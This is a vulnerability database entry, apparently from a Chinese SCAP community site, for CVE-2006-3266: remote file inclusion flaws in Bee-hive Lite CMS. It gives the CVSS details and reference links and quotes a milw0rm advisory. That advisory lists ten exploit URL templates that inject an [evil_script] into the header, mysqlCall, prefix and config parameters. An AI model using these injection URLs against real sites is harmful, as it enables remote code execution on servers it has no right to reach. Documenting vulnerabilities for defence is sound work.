CVE-2006-3266
CVSS5.1
发布时间 :2006-06-27 17:05:00
修订时间 :2011-03-07 21:38:14
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Bee-hive Lite 1.2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) header parameter to (a) conad/include/rootGui.inc.php and (b) include/rootGui.inc.php; (2) mysqlCall parameter to (c) conad/changeEmail.inc.php, (d) conad/changeUserDetails.inc.php, (e) conad/checkPasswd.inc.php, (f) conad/login.inc.php and (g) conad/logout.inc.php; (3) mysqlcall parameter to (h) include/listall.inc.php; (4) prefix parameter to (i) show/index.php; and (5) config parameter to (j) conad/include/mysqlCall.inc.php.


[CNNVD]Bee-hive 多个远程文件包含漏洞(CNNVD-200606-517)

        Bee-hive是一种Web CGI程序。
        Bee-hive在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        Bee-hive的多个脚本没有正确验证多个参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3266
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3266
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-517
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2516
(UNKNOWN)  VUPEN  ADV-2006-2516
http://secunia.com/advisories/20814
(VENDOR_ADVISORY)  SECUNIA  20814
http://milw0rm.com/exploits/1951
(VENDOR_ADVISORY)  MILW0RM  1951
http://xforce.iss.net/xforce/xfdb/27386
(UNKNOWN)  XF  beehive-multiple-scripts-file-include(27386)
http://www.securityfocus.com/bid/18654
(UNKNOWN)  BID  18654
http://www.osvdb.org/26824
(UNKNOWN)  OSVDB  26824
http://www.osvdb.org/26823
(UNKNOWN)  OSVDB  26823
http://www.osvdb.org/26822
(UNKNOWN)  OSVDB  26822
http://www.osvdb.org/26821
(UNKNOWN)  OSVDB  26821
http://www.osvdb.org/26820
(UNKNOWN)  OSVDB  26820
http://www.osvdb.org/26819
(UNKNOWN)  OSVDB  26819
http://www.osvdb.org/26818
(UNKNOWN)  OSVDB  26818
http://www.osvdb.org/26817
(UNKNOWN)  OSVDB  26817
http://www.osvdb.org/26816
(UNKNOWN)  OSVDB  26816
http://www.osvdb.org/26815
(UNKNOWN)  OSVDB  26815

- 漏洞信息

Bee-hive 多个远程文件包含漏洞
中危 访问验证错误
2006-06-27 00:00:00 2006-06-28 00:00:00
远程  
        Bee-hive是一种Web CGI程序。
        Bee-hive在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
        Bee-hive的多个脚本没有正确验证多个参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1951)

MagNet BeeHive CMS (header) Remote File Include Vulnerability (EDBID:1951)
php webapps
2006-06-25 Verified
0 Kw3[R]Ln
N/A [点击下载]
---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
# http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
# http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~
Nick: Kw3rLN
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-25]
		

- 漏洞信息

26815
Bee-hive Lite conad/include/rootGui.inc.php header Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Bee-hive Lite contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /conad/include/rootGui.inc.php script not properly sanitizing user input supplied to the 'header' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-25 Unknow
2006-06-25 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站